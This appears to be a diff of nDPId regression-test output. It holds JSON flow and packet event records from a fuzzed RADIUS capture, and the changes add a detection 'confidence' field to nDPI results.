 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1528997134036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997134036,"pkt":"ABxP+4rqcNuYVcUnCABFAADh\/WZAAPsRV2PG4hk1Cgx4HgcUchAAzWYuCzpCxXGn0Uh9HQ+OyLOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1528996996259,"flow_last_seen":1528997134582,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":15441,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528997050187,"flow_last_seen":1528997050383,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":498,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1528996996259,"flow_last_seen":1528997134582,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":15441,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528997050187,"flow_last_seen":1528997050383,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":498,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01383{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1528997212627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997212627,"pkt":"AAAMB6xAABRP+4p2CABFAALbIPZAAP8RAAAKDEAezuIZNXIQBxQCxwAAATwCvzm9iAIIk1e98ZWWJBeuNcEaCgAAV8gOBCUAGgwAAFfIDQZ3aWZpJQAAAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqVcATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQUNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmM0OWE1MjI1YiwgNWIyMmE1NDlOZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5BgasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAQwIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCHAA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGglqAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01261{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"ts_msec":1528997217637,"pkt":"AAAMB6xAABRP+4rqDABFAALHIPlAAP8RAAAKDEAexuIZNXIQBxQCswAAAT8Cqw8xhdF672TCSWbkw5Hj930aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqVhATUwMzFJNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3Bwbld0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LeoyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmZxMGFjMDAwMDAwYmM0OWE1MjI1YiwgNWIyMmE1NDkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5BAasFAEQIA5WWldDMlRlc3RMYWIaWAAAN2MBBgAAAAIGBgAAAAIMBgAABUM9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAnIkFwEAAAsFAADyEldFerwQeByQ1kXOElNqAwIAILdGopoaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyGQERVQaEAAAV8gKClN0YW5kYXJkGhBmAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoacAAAV8gRC0x5dGRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMlAFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOTQaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEkID4rD4BVEKK4FucluzaU0="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":3072}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1528997221594,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997221594,"pkt":"ABRP+4olANuYVcUnCABFAADh\/iUAAPwRVXHGnRk1CgxAHgcUchAAzbneC0AAxXHEG2jtNCK6Pim9jxODZEQBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWYyMmE1NDkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5T0oBAgBIFwEAAAEFAAC130tW1AOjyO4EWETLCns4AgUAADpBoI2KsgAA1NEalEdfz2mLAQACCwUAAKYxpY6FFiCOWOh\/rUxMKdLfEvgA+nuQ51DKsqmwU74i6PE="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01261{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"ts_msec":1528997221878,"pkt":"AAAMB6xAABRP+4rqCABFAALHIPtuAP8RAAAKDEAexuIZNXIQB1QCswAAAUECqxyBDV4hA0zB94U9KheYsYAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8Az1fICQlXSVNQUqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528997050187,"flow_last_seen":1528997050383,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":498,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528997050187,"flow_last_seen":1528997050383,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":498,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00596{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257160,"flow_last_seen":1528997257160,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1528997257160,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997257160,"pkt":"AAAMB6xAABRP+4rqCABFAALbtOtAAP8RAAAKDEAexuIZPnIQBxQC+gAAAUICv72vLkDLtEGtec5wfJGaESYaCgAAV8gOBFVDGgwWAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1qwZbIqWJATUwMzExNDhYMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwQWQ4OWE1MjI1YiwgNWIyMmE1ODkv